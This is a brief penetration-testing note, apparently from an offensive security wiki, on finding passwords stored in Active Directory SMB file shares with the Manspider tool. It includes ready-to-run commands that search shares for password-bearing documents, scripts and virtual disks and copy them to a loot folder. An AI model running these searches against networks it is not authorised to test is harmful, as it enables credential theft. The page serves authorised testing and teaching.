# File Shares

There are multiple different highly technical ways of extracting credentials from various places within Active Directory. However, like social engineering, users can allow us access in times when technical protections require much time and expertise.

People like to store passwords in Excel files or Word files or batch scripts or PowerShell scripts or PDFs or x y z. Why not look for these files?

## Manspider

{% embed url="<https://github.com/blacklanternsecurity/MANSPIDER>" %}

Manspider is a great tool for spidering SMB file shares to search for files that match what you're looking for. Here are the ones I almost always attempt (examples are similar to ones in the GitHub repository):

```fish
# Search for filenames that contain the string "passw"
manspider smb_alive.txt -f passw -d [domain] -u [username] -p [password]

# Search for documents that contain the string "passw"
manspider smb_alive.txt -c passw -e xlsx csv docx pdf -d [domain] -u [username] -p [password]

# Search for files with script-related extensions
manspider smb_alive.txt -e bat vbs ps1 psd1 psm1 -d [domain] -u [username] -p [password]

# Search for virtual disks
manspider smb_alive.txt -e vmdk vhd vdi -d [domain] -u [username] -p [password]
```

{% hint style="info" %}
Any files identified will go to your *\~/.manspider/loot/* directory by default.
{% endhint %}

{% hint style="warning" %}
If you're considering Opsec, keep in mind that this tool will authenticate as a single user to many many computers (if configured to) within a short amount of time and touch a lot of files. This is LOUD.
{% endhint %}